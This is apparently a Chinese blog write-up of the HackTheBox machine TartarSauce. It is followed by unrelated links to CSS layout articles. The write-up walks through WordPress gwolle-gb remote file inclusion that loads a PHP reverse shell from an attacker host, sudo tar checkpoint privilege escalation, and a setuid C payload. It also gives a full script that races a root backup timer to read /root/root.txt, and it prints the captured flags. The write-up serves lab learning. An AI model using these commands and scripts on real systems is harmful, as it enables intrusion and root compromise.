[Meachines] [Medium] TartarSauce Wordpress-gwolle-gb-RFI+tar权限提升+定时器备份文件权限提升

于 2024-08-17 21:57:40 发布
阅读量333 收藏 4
点赞数 2
分类专栏: HackTheBox 文章标签: wordpress
Whoami? Martin
本文链接:https://blog.csdn.net/qq_51886509/article/details/141287328
版权

信息收集

IP AddressOpening Ports
10.10.10.88TCP:80

$ nmap -p- 10.10.10.88 --min-rate 1000 -sC -sV

PORT   STATE SERVICE    VERSION
80/tcp open  tcpwrapped

Wordpress & gwolle-gb & RFI

image.png

$ feroxbuster --url http://10.10.10.88/

image-1.png

$ wpscan --url http://10.10.10.88:80/webservices/wp -e ap --plugins-detection aggressive -t 100

image-2.png

image-3.png

$ curl 'http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.16.24/test'

image-4.png

$ cp /usr/share/webshells/php/php-reverse-shell.php wp-load.php

image-5.png

$ curl 'http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.16.24/'

image-6.png

www-data to onuma

$ python -c 'import pty; pty.spawn("/bin/bash")'

$ sudo -l

image-7.png

$ sudo -u onuma tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

image-8.png

User.txt

1895da47f6758f6ddf1f8c8ea61b4c4a

权限提升

系统中有一个名为 “backuperer.service” 的 systemd 定时器每隔几分钟运行一次。

image-9.png

$ find / -name backuperer 2>/dev/null

image-10.png

$ cat /usr/sbin/backuperer

image-11.png

# 定义变量
basedir=/var/www/html    # 备份源目录
bkpdir=/var/backups       # 备份文件保存目录
tmpdir=/var/tmp           # 临时目录
testmsg=$bkpdir/onuma_backup_test.txt    # 记录备份运行时间的测试消息文件
errormsg=$bkpdir/onuma_backup_error.txt  # 记录备份错误的文件
tmpfile=$tmpdir/.$(/usr/bin/head -c100 /dev/urandom |sha1sum|cut -d' ' -f1)  # 存储备份文件的临时文件,文件名是从随机数据生成的 SHA1 哈希
check=$tmpdir/check      # 临时目录,用于存储解压后的备份文件

# 格式化函数
printbdr() {
    for n in $(seq 72); do
        /usr/bin/printf $"-"
    done
}
bdr=$(printbdr)  # 将分隔符保存到 bdr 变量中

# 记录备份时间
/usr/bin/printf $"$bdr\nAuto backup backuperer backup last ran at : $(/bin/date)\n$bdr\n" > $testmsg

# 清理
/bin/rm -rf $tmpdir/.* $check

# 执行备份
/usr/bin/sudo -u onuma /bin/tar -zcvf $tmpfile $basedir &

# 等待备份完成
/bin/sleep 30

# 检查备份完整性
integrity_chk() {
    /usr/bin/diff -r $basedir $check$basedir
}

# 创建 $check 目录
/bin/mkdir $check

# 解压备份文件
/bin/tar -zxvf $tmpfile -C $check

# 调用 integrity_chk 函数检查备份的完整性
if [[ $(integrity_chk) ]]; then
    # 记录错误信息并退出
    /usr/bin/printf $"$bdr\nIntegrity Check Error in backup last ran :  $(/bin/date)\n$bdr\n$tmpfile\n" >> $errormsg
    integrity_chk >> $errormsg
    exit 2
else
    # 移动备份文件到目标目录并清理临时文件
    /bin/mv $tmpfile $bkpdir/onuma-www-dev.bak
    /bin/rm -rf $check .*
    exit 0
fi

1.自动清除/tmp目录下以.并且以SHA1 哈希值开头的隐藏备份文件.
2.使用onuma权限备份/var/www/html目录下文件到/var/tmp目录,存储备份文件的临时文件,文件名是从随机数据生成的 SHA1 哈希.
3./var/tmp目录中被创建check文件夹.
4.解压备份文件/var/tmp中,以.并且以SHA1 哈希值开头的隐藏备份文件到/var/tmp/check目录
5.调用 integrity_chk 函数检查备份的完整性

主要问题存在于/bin/tar -zxvf $tmpfile -C $check作用于/var/tmp中提取文件覆盖到/var/tmp/check目录中,我们需要在在它备份成一个.hash文件的时候劫持替换成恶意的压缩文件

构造payload

//setuid.c
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

int main(void) {
    setuid(0);
    setgid(0);
    system("/bin/sh");
}

$ sudo apt install gcc-multilib

$ gcc -m32 -o setuid setuid.c

$ chmod 4755 setuid

$ mkdir -p var/www/html

$ mv setuid ./var/www/html

$ tar -zcvf setuid.tar.gz var/

onuma@TartarSauce:/var/tmp$ wget http://10.10.16.24/setuid.tar.gz

等待定时器执行后在/var/tmp下会出现一个文件

.xxxxxx

image-12.png

替换文件

$ cp setuid.tar.gz .0d2369d13e9d34f9b994242d49e4446197b2ef18

整个过程只有5分钟之内可以利用,否则会将check文件删除,这里为var/www/html是为了绕过integrity_chk函数,不产生错误的正常的执行完成。它会比较/var/tmp/check的目录结构是否和/var/www/html下的路径是否一致。

image-13.png

onuma@TartarSauce:/var/tmp/check/var/www/html$ ./setuid

但是似乎不兼容

image-14.png

利用软连接+错误日志获取Flag

#!/bin/bash
# exp.sh
# work out of shm
cd /dev/shm

# set both start and cur equal to any backup file if it's there
start=$(find /var/tmp -maxdepth 1 -type f -name ".*")
cur=$(find /var/tmp -maxdepth 1 -type f -name ".*")

# loop until there's a change in cur
echo "Waiting for archive filename to change..."
while [ "$start" == "$cur" -o "$cur" == "" ] ; do
    sleep 10;
    cur=$(find /var/tmp -maxdepth 1 -type f -name ".*");
done

# Grab a copy of the archive
echo "File changed... copying here"
cp $cur .

# get filename
fn=$(echo $cur | cut -d'/' -f4)

# extract archive
tar -zxf $fn

# remove robots.txt and replace it with link to root.txt
rm var/www/html/robots.txt
ln -s /root/root.txt var/www/html/robots.txt

# remove old archive
rm $fn

# create new archive
tar czf $fn var

# put it back, and clean up
mv $fn $cur
rm $fn
rm -rf var

# wait for results
echo "Waiting for new logs..."
tail -f /var/backups/onuma_backup_error.txt

$ wget http://10.10.16.24/exp.sh
$ chmod +x exp.sh
$ ./exp.sh

image-15.png

Root.txt

6d1a541ae753613c68668f1ed114ffc9

Мартин.
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
display属性和flex grid布局
Berg_liu的博客
11-07 1351
Display属性表 Flex布局 FlexFlexible Box 的缩写,意为"弹性布局",用来为盒状模型提供最大的灵活性。 容器默认存在两根轴:水平的主轴(main axis)和垂直的交叉轴(cross axis)。主轴的开始位置(与边框的交叉点)叫做main start,结束位置叫做main end;交叉轴的开始位置叫做cross start,结束位置叫做cross end。 项目默认沿主轴排列。单个项目占据的主轴空间叫做main size,占据的交叉轴空间叫...
flex grid布局
m0_61894608的博客
08-01 1125
file grid
了解flex布局grid布局
最新发布
qq_41367352的博客
07-11 912
Flexible Box 模型,通常被称为 flexbox(弹性布局),是一种一维的布局模型。//块级元素//行内元素flex布局支持6个容器属性:属性网格布局,是一个二维的布局方式,由纵横相交的两组网格线形成的框架性布局结构,能够同时处理行与列。//块级元素//行内元素。
安卓作业11 - 网格布局练习
m0_46204302的博客
01-12 113
网格布局练习1: 编写activity_main.xml布局资源文件 <?xml version="1.0" encoding="utf-8"?> <GridLayout android:layout_width="wrap_content" android:layout_height="wrap_content" android:layout_marginTop="10dp" android:columnCount="5" android:row
android的计算器简单布局————网格布局
董文武的博客
11-03 1135
首先先放出效果图: 我是用线性布局,中间插入网格布局。并将方向设置为垂直, &amp;lt;TextView android:layout_width=&quot;match_parent&quot; android:layout_height=&quot;50dp&quot; android:background=&quot;@dra
css布局练习
shiyu18的博客
10-28 835
css练习 css练习布局,并完成一下布局: 要求:主要练习布局,并且精简代码(浏览器加载时 提升浏览器加载速度) 分析:除首航文字外,其余部分均是图片,并且一二行图片和三四行图片间距,宽高相等。 代码实现: 1.html部分: <!doctype html> <html> <head> <meta charset="utf-8"> <title>2</title> <link rel="stylesheet" ty
拥抱未来的CSS布局方式flexgrid布局
08-11
"拥抱未来的CSS布局方式flexgrid布局"这个主题将深入探讨两种主流的布局技术:Flexbox(弹性盒布局)和Grid Layout(网格布局),它们彻底改变了我们对网页布局的理解和实践。 **一、Flexbox布局** Flexbox,...
Div+Css页面布局实战
06-16
2. 布局模式:了解流体布局、固定布局网格布局和响应式布局等常见布局模式,以及如何根据项目需求选择合适的布局策略。 3. 盒模型与定位:深入学习CSS盒模型,包括标准盒模型和IE盒模型的区别,以及如何使用...
网站布局练习div模板
04-02
2. **CSS布局技术**:CSS提供了多种布局方法,如流式布局(Flow Layout)、网格布局Grid Layout)和Flexbox(弹性盒模型)。在单页布局中,Flexbox尤其适用,因为它可以轻松实现内容的水平和垂直对齐,自适应屏幕...
Taller-CSS-Flex-Grid:现代布局研讨会
04-08
2. CSS Grid网格布局): CSS Grid是二维布局系统,用于创建复杂的网格结构。关键属性包括: - `display: grid`:设置容器为Grid容器。 - `grid-template-columns`/`grid-template-rows`:定义网格的列和行。 ...
可视化布局_html5_js_beganth5_css_可视化布局js_
09-30
3. **Grid布局**:了解网格系统,设置网格轨道、行和列,使用grid-template-areas创建自定义布局。 4. **响应式设计**:利用媒体查询(@media rule)实现不同屏幕尺寸下的适配。 5. **JavaScript交互**:学习如何...
CSS布局练习
前端攻城狮进阶之路
06-23 1893
&lt;!DOCTYPE html&gt; &lt;html&gt; &lt;head&gt; &lt;meta charset="utf-8" /&gt; &lt;meta http-equiv="X-UA-Compatible" content="IE=edge"&gt; &lt;title&gt;Page Title&amp
css grid布局flex布局是什么?
xiaowu2022的博客
12-29 417
css中,grid布局指的是“网格布局”,是一个二维系统,可以同时处理行和列,可以通过将css规则用于父元素和该元素的子元素来使用网格布局;而flex布局指的是“弹性布局”,是一个一维系统,用来为盒状模型提供最大的灵活性。 (推荐教程:CSS视频教程) 一、flex布局简介 flexflexible box(弹性布局)的简介,是一个一维系统,用来为盒状模型提供最大的灵活性。 使用:任何容器(行内元素可设置为display:inline-block); 特点:空间分布在行中进行,而非整体 二、grid布局
CSS简单布局练习(一)
eatrobins的博客
02-06 1129
CSS简单布局(一) 工字形布局将整体分为四个部分,是简洁的css布局,操作较简单。 HTML如下 <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>KK's Blog</title> <link rel="stylesheet" type="text/css" href="exercise1.css"> </head>
Flex Grid布局
hqin_520的博客
12-20 793
一、浏览器内核 Chrome浏览器:早期webkit内核,后来是chromium/blink 内核 IE浏览器:trident内核 ,win10 之后微软推出edge,用edge Html内核 火狐浏览器:Gecko内核 opera浏览器:presto内核(弃用),后来webkit内核,后来Blink内容 Safari浏览器:webkit内核 360/猎豹浏览器:trident内核+Blink内核 搜狗/QQ浏览器:trident内核+webkit 二、flex布局 - 弹性盒子布局,一维
CSS flex布局练习
风夜岚的博客
04-10 4393
flex布局练习 ( 刚入职,觉得自己flex布局用的很烂,周末自己找的练习地方,觉得还不错,记录下来推荐给大家。) 描述 练习名字:Flexbox Defense 练习地址:http://www.flexboxdefense.com/ 练习描述:是个塔防游戏,通过用css 利用flex布局操作炮台位置 达到练习flex布局 的效果;共12关。 练习前必读:这个练习项目是对flex布局有点了解但用的很生疏的人群;如果对于flex布局完全不了解的,可以先去看 阮一峰 大佬关于flex的博客再来练习巩固,大佬
网页简单布局练习——CSS
mantou_riji的博客
04-11 353
效果: 代码: <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8" /> <link rel="stylesheet" href="../reset.css" /> <style> header, main, footer { width: 1000px; margin
CSS布局练习——完成效果图
iuukai
01-08 809
原图链接:https://jingyan.baidu.com/article/e8cdb32b1db1d037042bad61.html 第一次练习:使用table+margin 敲码测试过程中发现的问题:HTML 去掉table表单里面td之间的间距 1.table表单自带的间距,容易影响精度。 2.td{ padding:0; nargin: 0;}这个只能消除td的边距,但是整个tab...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值